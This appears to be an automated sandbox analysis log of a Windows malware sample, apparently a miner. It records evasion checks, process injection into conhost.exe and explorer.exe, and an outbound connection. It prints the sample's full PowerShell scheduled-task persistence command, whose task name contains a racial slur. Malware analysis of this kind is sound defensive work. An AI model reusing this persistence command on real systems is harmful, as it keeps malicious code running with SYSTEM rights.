                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3816
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4922
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3288
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5155
                Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 6791
                Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 3208
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5765
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2803
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6880
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 517
                Source: C:\Program Files\MINA\m.exe Dropped PE file which has not been started: C:\Windows\Temp\wbiwcikhpmwr.tmp
                Source: C:\Program Files\MINA\m.exe Dropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sys
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320 Thread sleep count: 3816 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320 Thread sleep count: 4922 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776 Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844 Thread sleep count: 3288 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844 Thread sleep count: 5155 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780 Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272 Thread sleep count: 5765 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620 Thread sleep count: 2803 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\explorer.exe TID: 5952 Thread sleep count: 129 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136 Thread sleep count: 6880 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136 Thread sleep count: 517 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3868 Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2468 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                Source: m.exe, 00000006.00000000.2090382414.00007FF7C880B000.00000008.00000001.01000000.00000008.sdmp Binary or memory string: K^SX9Y_1HWQVMCIg
                Source: explorer.exe, 0000000D.00000002.4476974328.0000000001280000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWN
                Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                Source: explorer.exe, 0000000D.00000002.4476974328.0000000001280000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe Process information queried: ProcessInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Windows\System32\conhost.exe Code function: 10_2_00007FF6B2971180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA, 10_2_00007FF6B2971180
                Source: C:\Windows\System32\conhost.exe Code function: 10_2_00007FF6B299531C SetUnhandledExceptionFilter,WideCharToMultiByte, 10_2_00007FF6B299531C
                Source: C:\Windows\System32\conhost.exe Code function: 10_2_00007FF6B2986741 SetUnhandledExceptionFilter, 10_2_00007FF6B2986741

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\explorer.exe Network Connect: 44.196.193.227 10128
                Source: C:\Program Files\MINA\m.exe Memory written: PID: 6444 base: 1182010 value: 00
                Source: C:\Program Files\MINA\m.exe Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonly
                Source: C:\Program Files\MINA\m.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: readonly
                Source: C:\Program Files\MINA\m.exe Thread register set: target process: 6728
                Source: C:\Program Files\MINA\m.exe Thread register set: target process: 6444
                Source: C:\Program Files\MINA\m.exe Memory written: C:\Windows\System32\conhost.exe base: 1284A0A010
                Source: C:\Program Files\MINA\m.exe Memory written: C:\Windows\explorer.exe base: 1182010
                Source: C:\Program Files\MINA\m.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                Source: C:\Program Files\MINA\m.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zgpcu#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }
                Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#kbbksn#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zgpcu#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }
